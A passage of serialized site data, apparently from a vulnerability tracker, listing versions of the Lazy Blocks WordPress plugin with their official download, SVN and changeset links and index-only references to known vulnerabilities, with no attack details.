1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.1.0&new_path=%2Flazy-blocks%2Ftags%2F4.1.1",[616],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":618,"download_url":619,"svn_tag_url":620,"released_at":39,"has_diff":51,"diff_files_changed":621,"diff_lines":39,"trac_diff_url":622,"vulnerabilities":623,"is_current":51},"4.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.0.3&new_path=%2Flazy-blocks%2Ftags%2F4.1.0",[624,625],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":627,"download_url":628,"svn_tag_url":629,"released_at":39,"has_diff":51,"diff_files_changed":630,"diff_lines":39,"trac_diff_url":631,"vulnerabilities":632,"is_current":51},"4.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.0.2&new_path=%2Flazy-blocks%2Ftags%2F4.0.3",[633,634],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":636,"download_url":637,"svn_tag_url":638,"released_at":39,"has_diff":51,"diff_files_changed":639,"diff_lines":39,"trac_diff_url":640,"vulnerabilities":641,"is_current":51},"4.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.0.1&new_path=%2Flazy-blocks%2Ftags%2F4.0.2",[642,643],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":645,"download_url":646,"svn_tag_url":647,"released_at":39,"has_diff":51,"diff_files_changed":648,"diff_lines":39,"trac_diff_url":649,"vulnerabilities":650,"is_current":51},"4.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.0.0&new_path=%2Flazy-blocks%2Ftags%2F4.0.1",[651,652],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":654,"download_url":655,"svn_tag_url":656,"released_at":39,"has_diff":51,"diff_files_changed":657,"diff_lines":39,"trac_diff_url":658,"vulnerabilities":659,"is_current":51},"4.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.0.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F3.8.3&new_path=%2Flazy-blocks%2Ftags%2F4.0.0",[660,661],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":83,"download_url":663,"svn_tag_url":664,"released_at":39,"has_diff":51,"diff_files_changed":665,"diff_lines":39,"trac_diff_url":666,"vulnerabilities":667,"is_current":51},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.3.8.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F3.8.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F2.5.3&new_path=%2Flazy-blocks%2Ftags%2F3.8.3",[668,669],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":671,"download_url":672,"svn_tag_url":673,"released_at":39,"has_diff":51,"diff_files_changed":674,"diff_lines":39,"trac_diff_url":675,"vulnerabilities":676,"is_current":51},"2.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.2.5.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F2.5.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F1.8.2&new_path=%2Flazy-blocks%2Ftags%2F2.5.3",[677,678,679],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":78,"url_slug":79,"title":80,"severity":67,"cvss_score":84,"vuln_type":86,"patched_in_version":83},{"version":681,"download_url":682,"svn_tag_url":683,"released_at":39,"has_diff":51,"diff_files_changed":684,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":685,"is_current":51},"1.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.1.8.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F1.8.2\u002F",[],[686,687,688],{"id":61,"url_slug":62,"title":63,"severity":67,"cvss_score":68,"vuln_type":70,"patched_in_version":66},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":78,"url_slug":79,"title":80,"severity":67,"cvss_score":84,"vuln_type":86,"patched_in_version":83}]